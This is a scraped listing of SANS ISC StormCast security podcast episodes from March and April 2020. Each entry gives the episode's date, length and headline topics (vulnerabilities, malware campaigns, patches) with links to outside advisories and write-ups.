iOS Mail 0Day https://blog.zecops.com/vulnerabilities/unassisted-ios-attacks-via-mobilemail-maild-in-the-wild/ Zoom 5 To Be Released Shortly Addressing Encryption Issues https://blog.zoom.us/wordpress/2020/04/22/zoom-hits-milestone-on-90-day-security-plan-releases-zoom-5-0/ OpenSSL Fixes DOS Flaw https://www.openssl.org/news/secadv/20200421.txt
4/23/20206 minutes, 4 seconds
Episode Artwork

ISC StormCast for Thursday, April 23rd 2020

iOS Mail 0Day https://blog.zecops.com/vulnerabilities/unassisted-ios-attacks-via-mobilemail-maild-in-the-wild/ Zoom 5 To Be Released Shortly Addressing Encryption Issues https://blog.zoom.us/wordpress/2020/04/22/zoom-hits-milestone-on-90-day-security-plan-releases-zoom-5-0/ OpenSSL Fixes DOS Flaw https://www.openssl.org/news/secadv/20200421.txt
4/23/20206 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, April 22nd 2020

SpectX: Log Parser for DFIR https://isc.sans.edu/forums/diary/SpectX+Log+Parser+for+DFIR/26040/ Microsoft Patches Autodesk Library in Office https://www.autodesk.com/trust/security-advisories/adsk-sa-2020-0002 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200004 Stripe Data Collection https://mtlynch.io/stripe-recording-its-customers/ IBM Data Risk Manager Vulnerabilities https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md
4/22/20205 minutes, 56 seconds
Episode Artwork

ISC StormCast for Wednesday, April 22nd 2020

SpectX: Log Parser for DFIR https://isc.sans.edu/forums/diary/SpectX+Log+Parser+for+DFIR/26040/ Microsoft Patches Autodesk Library in Office https://www.autodesk.com/trust/security-advisories/adsk-sa-2020-0002 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200004 Stripe Data Collection https://mtlynch.io/stripe-recording-its-customers/ IBM Data Risk Manager Vulnerabilities https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md
4/22/20205 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, April 21st 2020

KPOT AutoIt Script: Analysis https://isc.sans.edu/forums/diary/KPOT+AutoIt+Script+Analysis/26012/ FPGA Vulnerablity https://www.usenix.org/conference/usenixsecurity20/presentation/ender Nagios XI Vulnerability https://exchange.xforce.ibmcloud.com/vulnerabilities/179406
4/21/20205 minutes, 47 seconds
Episode Artwork

ISC StormCast for Tuesday, April 21st 2020

KPOT AutoIt Script: Analysis https://isc.sans.edu/forums/diary/KPOT+AutoIt+Script+Analysis/26012/ FPGA Vulnerablity https://www.usenix.org/conference/usenixsecurity20/presentation/ender Nagios XI Vulnerability https://exchange.xforce.ibmcloud.com/vulnerabilities/179406
4/21/20205 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, April 20th 2020

Weaponized RTF Document Generator Mailer in PowerShell https://isc.sans.edu/forums/diary/Weaponized+RTF+Document+Generator+Mailer+in+PowerShell/26030/ Microsoft Fixes Bad Anti-Malware Signatures https://www.microsoft.com/en-us/wdsi/definitions/antimalware-definition-release-notes Sophos Pulls Bad Firmware Update https://community.sophos.com/kb/en-us/135383 Credentials Stolen from Pulse Secure VPN Abused https://www.us-cert.gov/ncas/alerts/aa20-107a Chrome Update https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_15.html
4/20/20205 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, April 20th 2020

Weaponized RTF Document Generator Mailer in PowerShell https://isc.sans.edu/forums/diary/Weaponized+RTF+Document+Generator+Mailer+in+PowerShell/26030/ Microsoft Fixes Bad Anti-Malware Signatures https://www.microsoft.com/en-us/wdsi/definitions/antimalware-definition-release-notes Sophos Pulls Bad Firmware Update https://community.sophos.com/kb/en-us/135383 Credentials Stolen from Pulse Secure VPN Abused https://www.us-cert.gov/ncas/alerts/aa20-107a Chrome Update https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_15.html
4/20/20205 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, April 17th 2020

Applocker vs. Living off the Land Attacks https://isc.sans.edu/forums/diary/Using+AppLocker+to+Prevent+Living+off+the+Land+Attacks/26032/ Netlink GPON 0-Day https://blog.netlab.360.com/multiple-fiber-routers-are-being-compromised-by-botnets-using-0-day-en/ Windows Security Crashing After Definition Update https://www.askwoody.com/2020/reports-of-windows-security-nee-microsoft-security-essentials-crashing-after-installing-this-mornings-definition-updates/ 700 Malicious Ruby Gems Found https://thehackernews.com/2020/04/rubygem-typosquatting-malware.html vCenter Exploit for CVE-2020-3952 https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/
4/17/20205 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, April 17th 2020

Applocker vs. Living off the Land Attacks https://isc.sans.edu/forums/diary/Using+AppLocker+to+Prevent+Living+off+the+Land+Attacks/26032/ Netlink GPON 0-Day https://blog.netlab.360.com/multiple-fiber-routers-are-being-compromised-by-botnets-using-0-day-en/ Windows Security Crashing After Definition Update https://www.askwoody.com/2020/reports-of-windows-security-nee-microsoft-security-essentials-crashing-after-installing-this-mornings-definition-updates/ 700 Malicious Ruby Gems Found https://thehackernews.com/2020/04/rubygem-typosquatting-malware.html vCenter Exploit for CVE-2020-3952 https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/
4/17/20205 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, April 16th 2020

Hunting Without IOCs https://isc.sans.edu/forums/diary/No+IOCs+No+Problem+Getting+a+Start+Hunting+for+Malicious+Office+Files/26026/ Cloudflare/Online Banking Outages https://twitter.com/eastdakota/status/1250520852354854912 Crypto Currency Stealing Browser Extensions https://medium.com/mycrypto/discovering-fake-browser-extensions-that-target-users-of-ledger-trezor-mew-metamask-and-more-e281a2b80ff9
4/16/20205 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, April 16th 2020

Hunting Without IOCs https://isc.sans.edu/forums/diary/No+IOCs+No+Problem+Getting+a+Start+Hunting+for+Malicious+Office+Files/26026/ Cloudflare/Online Banking Outages https://twitter.com/eastdakota/status/1250520852354854912 Crypto Currency Stealing Browser Extensions https://medium.com/mycrypto/discovering-fake-browser-extensions-that-target-users-of-ledger-trezor-mew-metamask-and-more-e281a2b80ff9
4/16/20205 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, April 15th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+April+2020+Patch+Tuesday/26022/ Adobe Security Bulletins https://helpx.adobe.com/security.html Microsoft Extending EOL For Windows 10 1709/1809 https://support.microsoft.com/en-us/help/4557164/lifecycle-changes-to-end-of-support-and-servicing-dates Dell Safe BIOS https://blog.dellemc.com/en-us/dell-technologies-bolsters-pc-security-todays-remote-workers/
4/15/20205 minutes
Episode Artwork

ISC StormCast for Wednesday, April 15th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+April+2020+Patch+Tuesday/26022/ Adobe Security Bulletins https://helpx.adobe.com/security.html Microsoft Extending EOL For Windows 10 1709/1809 https://support.microsoft.com/en-us/help/4557164/lifecycle-changes-to-end-of-support-and-servicing-dates Dell Safe BIOS https://blog.dellemc.com/en-us/dell-technologies-bolsters-pc-security-todays-remote-workers/
4/15/20205 minutes
Episode Artwork

ISC StormCast for Tuesday, April 14th 2020

Comparing the same Phishing Campaign 3 Months Appart https://isc.sans.edu/forums/diary/Look+at+the+same+phishing+campaign+3+months+apart/26018/ Setting 3D Printers On Fire https://www.coalfire.com/The-Coalfire-Blog/April-2020/With-IoT-Common-Devices-Pose-New-Threats Junos OS: vMX Default Credentials https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10998 DNS is Changing: So What? (@Mic Webinar) https://www.sans.org/webcasts/113635
4/14/20206 minutes, 20 seconds
Episode Artwork

ISC StormCast for Tuesday, April 14th 2020

Comparing the same Phishing Campaign 3 Months Appart https://isc.sans.edu/forums/diary/Look+at+the+same+phishing+campaign+3+months+apart/26018/ Setting 3D Printers On Fire https://www.coalfire.com/The-Coalfire-Blog/April-2020/With-IoT-Common-Devices-Pose-New-Threats Junos OS: vMX Default Credentials https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10998 DNS is Changing: So What? (@Mic Webinar) https://www.sans.org/webcasts/113635
4/14/20206 minutes, 20 seconds
Episode Artwork

ISC StormCast for Monday, April 13th 2020

Dynamic Analysis Technique to Get Decrypted KPOT Malware https://isc.sans.edu/forums/diary/Reader+Analysis+Dynamic+analysis+technique+to+get+decrypted+KPOT+Malware/26010/ VMWare vCenter Server Vulnerability https://www.vmware.com/security/advisories/VMSA-2020-0006.html Sodinokibi Ransomware Switching to Monero https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/ Malware Impersonates Security Researchers https://www.bleepingcomputer.com/news/security/new-wiper-malware-impersonates-security-researchers-as-prank/
4/13/20205 minutes, 18 seconds
Episode Artwork

ISC StormCast for Monday, April 13th 2020

Dynamic Analysis Technique to Get Decrypted KPOT Malware https://isc.sans.edu/forums/diary/Reader+Analysis+Dynamic+analysis+technique+to+get+decrypted+KPOT+Malware/26010/ VMWare vCenter Server Vulnerability https://www.vmware.com/security/advisories/VMSA-2020-0006.html Sodinokibi Ransomware Switching to Monero https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/ Malware Impersonates Security Researchers https://www.bleepingcomputer.com/news/security/new-wiper-malware-impersonates-security-researchers-as-prank/
4/13/20205 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, April 10th 2020

Spoofing OS Fingerprints https://isc.sans.edu/forums/diary/Performing+deception+to+OS+Fingerprint+Part+1+nmap/25960/ Dell iDRAC Patch https://www.dell.com/support/article/de-de/sln320717/dsa-2020-063-idrac-buffer-overflow-vulnerability?lang=en VISA Ends Magento 1 Support https://usa.visa.com/content/dam/VCOM/global/support-legal/documents/acquirer-advisory-magento-migration.pdf Slack WebRTC TURN Compromise https://www.rtcsec.com/2020/04/01-slack-webrtc-turn-compromise/ COVID 19 Domain Classifier https://isc.sans.edu/covidclassifier.html
4/10/20205 minutes, 45 seconds
Episode Artwork

ISC StormCast for Friday, April 10th 2020

Spoofing OS Fingerprints https://isc.sans.edu/forums/diary/Performing+deception+to+OS+Fingerprint+Part+1+nmap/25960/ Dell iDRAC Patch https://www.dell.com/support/article/de-de/sln320717/dsa-2020-063-idrac-buffer-overflow-vulnerability?lang=en VISA Ends Magento 1 Support https://usa.visa.com/content/dam/VCOM/global/support-legal/documents/acquirer-advisory-magento-migration.pdf Slack WebRTC TURN Compromise https://www.rtcsec.com/2020/04/01-slack-webrtc-turn-compromise/ COVID 19 Domain Classifier https://isc.sans.edu/covidclassifier.html
4/10/20205 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, April 9th 2020

German Malspam Pushes ZLoader Malware; Decrypting HTTPs https://isc.sans.edu/forums/diary/German+malspam+pushes+ZLoader+malware/25996/ Microsoft Purchases Corp.com https://krebsonsecurity.com/2020/04/microsoft-buys-corp-com-so-bad-guys-cant/ Microsoft Delaying Removal of Basic Authentiation from Exchange Online https://techcommunity.microsoft.com/t5/exchange-team-blog/basic-authentication-and-exchange-online-april-2020-update/ba-p/1275508 Dark Nexus Botnet https://www.bitdefender.com/files/News/CaseStudies/study/319/Bitdefender-PR-Whitepaper-DarkNexus-creat4349-en-EN-interactive.pdf
4/9/20205 minutes, 54 seconds
Episode Artwork

ISC StormCast for Thursday, April 9th 2020

German Malspam Pushes ZLoader Malware; Decrypting HTTPs https://isc.sans.edu/forums/diary/German+malspam+pushes+ZLoader+malware/25996/ Microsoft Purchases Corp.com https://krebsonsecurity.com/2020/04/microsoft-buys-corp-com-so-bad-guys-cant/ Microsoft Delaying Removal of Basic Authentiation from Exchange Online https://techcommunity.microsoft.com/t5/exchange-team-blog/basic-authentication-and-exchange-online-april-2020-update/ba-p/1275508 Dark Nexus Botnet https://www.bitdefender.com/files/News/CaseStudies/study/319/Bitdefender-PR-Whitepaper-DarkNexus-creat4349-en-EN-interactive.pdf
4/9/20205 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, April 8th 2020

RDP Scanning Increase https://isc.sans.edu/forums/diary/Increase+in+RDP+Scanning/25994/ Atlassian Advices Users To Secure Jira Service Desk https://community.atlassian.com/t5/Jira-Service-Desk-articles/Tips-for-setting-customer-permissions-in-Jira-Service-Desk/ba-p/1340617 Android Updates https://support.google.com/pixelphone/thread/38337876
4/8/20205 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, April 8th 2020

RDP Scanning Increase https://isc.sans.edu/forums/diary/Increase+in+RDP+Scanning/25994/ Atlassian Advices Users To Secure Jira Service Desk https://community.atlassian.com/t5/Jira-Service-Desk-articles/Tips-for-setting-customer-permissions-in-Jira-Service-Desk/ba-p/1340617 Android Updates https://support.google.com/pixelphone/thread/38337876
4/8/20205 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, April 7th 2020

ROSTELECOM Reroutes Traffic for Multiple Cloud Providers https://twitter.com/bgpmon/status/1246842916502302723 https://bgpstream.com/event/230837 Vuln Cost Security Scanner for VS Code https://snyk.io/security-scanner-vuln-cost/ Microsoft Exchange Server Vulnerability still not Patched https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/ Fake Zoom Installer https://blog.trendmicro.com/trendlabs-security-intelligence/zoomed-in-a-look-into-a-coinminer-bundled-with-zoom-installer/
4/7/20206 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, April 7th 2020

ROSTELECOM Reroutes Traffic for Multiple Cloud Providers https://twitter.com/bgpmon/status/1246842916502302723 https://bgpstream.com/event/230837 Vuln Cost Security Scanner for VS Code https://snyk.io/security-scanner-vuln-cost/ Microsoft Exchange Server Vulnerability still not Patched https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/ Fake Zoom Installer https://blog.trendmicro.com/trendlabs-security-intelligence/zoomed-in-a-look-into-a-coinminer-bundled-with-zoom-installer/
4/7/20206 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, April 6th 2020

New Bypass Technique or Corrupt Word Document https://isc.sans.edu/forums/diary/New+Bypass+Technique+or+Corrupt+Word+Document/25984/ CitizenLab Analyzes Zoom Encryption https://citizenlab.ca/2020/04/move-fast-roll-your-own-crypto-a-quick-look-at-the-confidentiality-of-zoom-meetings/ https://www.sans.org/webcasts/zomg-its-zoom-114670 Mozilla Patches Critical Firefox Flaws https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/ Malicious JavaScript injected into Discord https://www.bleepingcomputer.com/news/security/discord-turned-into-an-account-stealer-by-updated-malware/
4/6/20205 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, April 6th 2020

New Bypass Technique or Corrupt Word Document https://isc.sans.edu/forums/diary/New+Bypass+Technique+or+Corrupt+Word+Document/25984/ CitizenLab Analyzes Zoom Encryption https://citizenlab.ca/2020/04/move-fast-roll-your-own-crypto-a-quick-look-at-the-confidentiality-of-zoom-meetings/ https://www.sans.org/webcasts/zomg-its-zoom-114670 Mozilla Patches Critical Firefox Flaws https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/ Malicious JavaScript injected into Discord https://www.bleepingcomputer.com/news/security/discord-turned-into-an-account-stealer-by-updated-malware/
4/6/20205 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, April 3rd 2020

Twitter Cache Bug in Firefox https://privacy.twitter.com/en/blog/2020/data-cache-firefox MS-SQL Server Attack https://www.guardicore.com/2020/04/vollgar-ms-sql-servers-under-attack/ More Zoom Vulnerabilities https://objective-see.com/blog/blog_0x56.html Covid-19 Economic Impact Payments Scams https://www.justice.gov/usao-edky/press-release/file/1265371/download Safari Camera Access Bug https://www.ryanpickren.com/webcam-hacking-overview
4/3/20206 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, April 3rd 2020

Twitter Cache Bug in Firefox https://privacy.twitter.com/en/blog/2020/data-cache-firefox MS-SQL Server Attack https://www.guardicore.com/2020/04/vollgar-ms-sql-servers-under-attack/ More Zoom Vulnerabilities https://objective-see.com/blog/blog_0x56.html Covid-19 Economic Impact Payments Scams https://www.justice.gov/usao-edky/press-release/file/1265371/download Safari Camera Access Bug https://www.ryanpickren.com/webcam-hacking-overview
4/3/20206 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, April 2nd 2020

Quakbot Malspam Sent From an Infected Windows Host https://isc.sans.edu/forums/diary/Qakbot+malspam+sent+from+an+infected+Windows+host/25972/ TPOT Cowrie to ISC Logs https://isc.sans.edu/forums/diary/TPOTs+Cowrie+to+ISC+Logs/25976/ SSH Issues After MacOS Update https://feed.tyler.io/so-uh-i-think-catalina-10154-broke-ssh/ Cloudflare DNS For Families https://blog.cloudflare.com/introducing-1-1-1-1-for-families/ Zoom Leaks Windows Password Hashes via UNC Links https://twitter.com/hackerfantastic/status/1245133371262619654
4/2/20206 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, April 2nd 2020

Quakbot Malspam Sent From an Infected Windows Host https://isc.sans.edu/forums/diary/Qakbot+malspam+sent+from+an+infected+Windows+host/25972/ TPOT Cowrie to ISC Logs https://isc.sans.edu/forums/diary/TPOTs+Cowrie+to+ISC+Logs/25976/ SSH Issues After MacOS Update https://feed.tyler.io/so-uh-i-think-catalina-10154-broke-ssh/ Cloudflare DNS For Families https://blog.cloudflare.com/introducing-1-1-1-1-for-families/ Zoom Leaks Windows Password Hashes via UNC Links https://twitter.com/hackerfantastic/status/1245133371262619654
4/2/20206 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, April 1st 2020

Kwampirs Update https://isc.sans.edu/forums/diary/Kwampirs+Targeted+Attacks+Involving+Healthcare+Sector/25968/ Exposed RDP https://blog.shodan.io/trends-in-internet-exposure/ D-Link DSL-2640B Vulnerability https://raelize.com/posts/d-link-dsl-2640b-security-advisories/ SMB 3.1.1 (CVE-2020-0796) Local Privilege Escalation Exploit https://github.com/danigargu/CVE-2020-0796
4/1/20206 minutes, 57 seconds
Episode Artwork

ISC StormCast for Wednesday, April 1st 2020

Kwampirs Update https://isc.sans.edu/forums/diary/Kwampirs+Targeted+Attacks+Involving+Healthcare+Sector/25968/ Exposed RDP https://blog.shodan.io/trends-in-internet-exposure/ D-Link DSL-2640B Vulnerability https://raelize.com/posts/d-link-dsl-2640b-security-advisories/ SMB 3.1.1 (CVE-2020-0796) Local Privilege Escalation Exploit https://github.com/danigargu/CVE-2020-0796
4/1/20206 minutes, 57 seconds
Episode Artwork

ISC StormCast for Tuesday, March 31st 2020

Crashing Windows Explorer Without a Click https://isc.sans.edu/forums/diary/Crashing+explorerexe+without+a+click/25966/ Zoom Privacy Policy https://blogs.harvard.edu/doc/2020/03/27/zoom/ Zoom Bombing https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic Zoom Related Domains Used for Phishing https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/
3/31/20206 minutes, 50 seconds
Episode Artwork

ISC StormCast for Tuesday, March 31st 2020

Crashing Windows Explorer Without a Click https://isc.sans.edu/forums/diary/Crashing+explorerexe+without+a+click/25966/ Zoom Privacy Policy https://blogs.harvard.edu/doc/2020/03/27/zoom/ Zoom Bombing https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic Zoom Related Domains Used for Phishing https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/
3/31/20206 minutes, 50 seconds
Episode Artwork

ISC StormCast for Monday, March 30th 2020

Covid19 Domain Classifier https://isc.sans.edu/covidclassifier.html https://www.youtube.com/watch?v=yNIlyJ3gI-4 Attackers Mail Malicious USB Drives and Teddy Bears https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/ HongKong News Sites Used to Install Malware on iOS Devices https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/
3/30/20205 minutes, 38 seconds
Episode Artwork

ISC StormCast for Monday, March 30th 2020

Covid19 Domain Classifier https://isc.sans.edu/covidclassifier.html https://www.youtube.com/watch?v=yNIlyJ3gI-4 Attackers Mail Malicious USB Drives and Teddy Bears https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/ HongKong News Sites Used to Install Malware on iOS Devices https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/
3/30/20205 minutes, 38 seconds
Episode Artwork

ISC StormCast for Friday, March 27th 2020

Very Large Sample as an Obfuscation Technique https://isc.sans.edu/forums/diary/Very+Large+Sample+as+Evasion+Technique/25948/ iOS VPN Bypass https://protonvpn.com/blog/apple-ios-vulnerability-disclosure/ Free Covid19 Domain List https://www.domaintools.com/resources/blog/free-covid-19-threat-list-domain-risk-assessments-for-coronavirus-threats Linux Rubber Ducky Protection https://opensource.googleblog.com/2020/03/usb-keystroke-injection-protection.html
3/27/20205 minutes, 40 seconds
Episode Artwork

ISC StormCast for Friday, March 27th 2020

Very Large Sample as an Obfuscation Technique https://isc.sans.edu/forums/diary/Very+Large+Sample+as+Evasion+Technique/25948/ iOS VPN Bypass https://protonvpn.com/blog/apple-ios-vulnerability-disclosure/ Free Covid19 Domain List https://www.domaintools.com/resources/blog/free-covid-19-threat-list-domain-risk-assessments-for-coronavirus-threats Linux Rubber Ducky Protection https://opensource.googleblog.com/2020/03/usb-keystroke-injection-protection.html
3/27/20205 minutes, 40 seconds
Episode Artwork

ISC StormCast for Thursday, March 26th 2020

Dridex Update https://isc.sans.edu/forums/diary/Recent+Dridex+activity/25944/ Covid-19 Ransom https://twitter.com/johullrich/status/1242983197555789824 HP Enterprise SSD Firmware Bug https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=a00097382en_us Fake Google Chrome Update https://news.drweb.com/show/?i=13746&lng=en TrickBot Pushing a 2FA Bypass App in Germany https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/
3/26/20205 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, March 26th 2020

Dridex Update https://isc.sans.edu/forums/diary/Recent+Dridex+activity/25944/ Covid-19 Ransom https://twitter.com/johullrich/status/1242983197555789824 HP Enterprise SSD Firmware Bug https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=a00097382en_us Fake Google Chrome Update https://news.drweb.com/show/?i=13746&lng=en TrickBot Pushing a 2FA Bypass App in Germany https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/
3/26/20205 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, March 25th 2020

Updated Microsoft Advisory 200006 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006 Memcached Denial of Service Vulnerability https://github.com/memcached/memcached/issues/629 Adobe Creative Cloud Desktop Application Patches https://helpx.adobe.com/security/products/creative-cloud/apsb20-11.html Microsoft Pausing Cumulative Updates Starting May https://docs.microsoft.com/en-us/windows/release-information/windows-message-center#405 Apple Security Patches https://support.apple.com/en-us/HT201222 OpenWRT Vulnerability Fixed https://thehackernews.com/2020/03/openwrt-rce-vulnerability.html
3/25/20205 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, March 25th 2020

Updated Microsoft Advisory 200006 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006 Memcached Denial of Service Vulnerability https://github.com/memcached/memcached/issues/629 Adobe Creative Cloud Desktop Application Patches https://helpx.adobe.com/security/products/creative-cloud/apsb20-11.html Microsoft Pausing Cumulative Updates Starting May https://docs.microsoft.com/en-us/windows/release-information/windows-message-center#405 Apple Security Patches https://support.apple.com/en-us/HT201222 OpenWRT Vulnerability Fixed https://thehackernews.com/2020/03/openwrt-rce-vulnerability.html
3/25/20205 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, March 24th 2020

Windows Font Parsing 0-Day https://isc.sans.edu/forums/diary/Windows+Zeroday+Actively+Exploited+Type+1+Font+Parsing+Remote+Code+Execution+Vulnerability/25936/ Covid-19 Malware Summary https://github.com/parthdmaniar/coronavirus-covid-19-SARS-CoV-2-IoCs Firefox Turns TLS 1.0/1.1 Back on https://www.mozilla.org/en-US/firefox/74.0/releasenotes/
3/24/20206 minutes, 1 second
Episode Artwork

ISC StormCast for Tuesday, March 24th 2020

Windows Font Parsing 0-Day https://isc.sans.edu/forums/diary/Windows+Zeroday+Actively+Exploited+Type+1+Font+Parsing+Remote+Code+Execution+Vulnerability/25936/ Covid-19 Malware Summary https://github.com/parthdmaniar/coronavirus-covid-19-SARS-CoV-2-IoCs Firefox Turns TLS 1.0/1.1 Back on https://www.mozilla.org/en-US/firefox/74.0/releasenotes/
3/24/20206 minutes, 1 second
Episode Artwork

ISC StormCast for Monday, March 23rd 2020

More Covid19 Malware https://isc.sans.edu/forums/diary/More+COVID19+Themed+Malware/25930/ Working Exploit for the Kr00k Wifi Exploit https://hexway.io/research/r00kie-kr00kie/ ZDI Pwn2Own Results https://www.zerodayinitiative.com/blog/2020/3/17/welcome-to-pwn2own-2020-the-schedule-and-live-results
3/23/20206 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, March 23rd 2020

More Covid19 Malware https://isc.sans.edu/forums/diary/More+COVID19+Themed+Malware/25930/ Working Exploit for the Kr00k Wifi Exploit https://hexway.io/research/r00kie-kr00kie/ ZDI Pwn2Own Results https://www.zerodayinitiative.com/blog/2020/3/17/welcome-to-pwn2own-2020-the-schedule-and-live-results
3/23/20206 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, March 20th 2020

COVID-19 Themed Multistage Malware https://isc.sans.edu/forums/diary/COVID19+Themed+Multistage+Malware/25922/ Cisco SD-WAN Patches https://tools.cisco.com/security/center/publicationListing.x oPatch Selling Patches for Windows 7 https://twitter.com/0patch/status/1240602635205586945 LDAPFragger: Bypassing network restrictions using LDAP attributes https://research.nccgroup.com/2020/03/19/ldapfragger-bypassing-network-restrictions-using-ldap-attributes/
3/20/20205 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, March 20th 2020

COVID-19 Themed Multistage Malware https://isc.sans.edu/forums/diary/COVID19+Themed+Multistage+Malware/25922/ Cisco SD-WAN Patches https://tools.cisco.com/security/center/publicationListing.x oPatch Selling Patches for Windows 7 https://twitter.com/0patch/status/1240602635205586945 LDAPFragger: Bypassing network restrictions using LDAP attributes https://research.nccgroup.com/2020/03/19/ldapfragger-bypassing-network-restrictions-using-ldap-attributes/
3/20/20205 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, March 19th 2020

TrendMicro Update https://success.trendmicro.com/solution/000245571 More VMWare Updates https://www.vmware.com/security/advisories/VMSA-2020-0005.html EnigmaSpark Malware https://securityintelligence.com/posts/EnigmaSpark-Politically-Themed-Cyber-Activity-Highlights-Regional-Opposition-to-Middle-East-Peace-Plan/ Recent Ransomware Trends https://www.fireeye.com/blog/threat-research/2020/03/they-come-in-the-night-ransomware-deployment-trends.html
3/19/20206 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, March 19th 2020

TrendMicro Update https://success.trendmicro.com/solution/000245571 More VMWare Updates https://www.vmware.com/security/advisories/VMSA-2020-0005.html EnigmaSpark Malware https://securityintelligence.com/posts/EnigmaSpark-Politically-Themed-Cyber-Activity-Highlights-Regional-Opposition-to-Middle-East-Peace-Plan/ Recent Ransomware Trends https://www.fireeye.com/blog/threat-research/2020/03/they-come-in-the-night-ransomware-deployment-trends.html
3/19/20206 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, March 18th 2020

A Quick Summary of Current Reflective DNS DDoS Attacks https://isc.sans.edu/forums/diary/A+Quick+Summary+of+Current+Reflective+DNS+DDoS+Attacks/25916/ Trickbot gtag red5 distributed as DLL File https://isc.sans.edu/forums/diary/Trickbot+gtag+red5+distributed+as+a+DLL+file/25918/ Is Cryptojacking Dead after Coinhive Shutdown https://arxiv.org/pdf/2001.02975.pdf Adobe Patches https://helpx.adobe.com/security/products/acrobat/apsb20-13.html
3/18/20207 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, March 18th 2020

A Quick Summary of Current Reflective DNS DDoS Attacks https://isc.sans.edu/forums/diary/A+Quick+Summary+of+Current+Reflective+DNS+DDoS+Attacks/25916/ Trickbot gtag red5 distributed as DLL File https://isc.sans.edu/forums/diary/Trickbot+gtag+red5+distributed+as+a+DLL+file/25918/ Is Cryptojacking Dead after Coinhive Shutdown https://arxiv.org/pdf/2001.02975.pdf Adobe Patches https://helpx.adobe.com/security/products/acrobat/apsb20-13.html
3/18/20207 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, March 17th 2020

Desktop.ini as a post-exploitation tool https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ VMWAre Workstatation/Fusion Update https://www.vmware.com/security/advisories/VMSA-2020-0004.html Blackwater Malware Abuses Cloudflare Workers https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/ tcpdump Heap Based Buffer Over-Read https://nvd.nist.gov/vuln/detail/CVE-2018-19325 Slack Account Takevoer Bug https://hackerone.com/reports/737140
3/17/20205 minutes, 52 seconds
Episode Artwork

ISC StormCast for Tuesday, March 17th 2020

